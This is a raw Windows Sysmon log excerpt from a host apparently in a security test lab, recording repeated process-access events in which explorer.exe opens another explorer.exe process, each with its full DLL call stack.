22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 